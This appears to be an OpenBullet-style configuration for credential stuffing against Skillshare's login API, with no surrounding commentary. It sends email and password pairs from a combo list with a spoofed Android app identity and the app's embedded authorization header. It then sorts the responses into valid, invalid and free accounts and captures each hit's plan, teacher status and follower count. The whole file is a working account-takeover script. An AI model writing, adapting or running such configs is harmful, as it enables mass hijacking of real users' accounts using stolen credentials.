[SETTINGS]
{
  "Name": "SkillShare",
  "SuggestedBots": 1,
  "LastModified": "2019-04-10T06:03:06.3431467-05:00",
  "AdditionalInfo": "",
  "Author": "",
  "Version": "1.0.1",
  "IgnoreResponseErrors": false,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://api.skillshare.com/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\",\"appsflyer_id\":\"1554893963288-117994040410421679\"}" 
  CONTENTTYPE "application/json; charset=UTF-8" 
  HEADER "Authorization: Basic c2tpbGxzaGFyZWFuZHJvaWQ6aiNhYWVnTTgvelg0cE0=" 
  HEADER "X-Embed-Mode: on" 
  HEADER "User-Agent: Skillshare/4.23.18; Android 4.4.2" 
  HEADER "Accept: application/vnd.skillshare.user+json;,version=1.3" 
  HEADER "Content-Type: application/json; charset=UTF-8" 
  HEADER "Content-Length: 107" 
  HEADER "Host: api.skillshare.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Incorrect email or password" 
  KEYCHAIN Success OR 
    KEY "membership_label\": \"" 
  KEYCHAIN Custom "FREE" OR 
    KEY "membership_label\": \"free\"," 

PARSE "<SOURCE>" JSON "is_teacher" -> CAP "Teacher?" 

PARSE "<SOURCE>" JSON "membership_label" -> CAP "Plan" 

PARSE "<SOURCE>" JSON "numFollowers" -> CAP "Followers" 

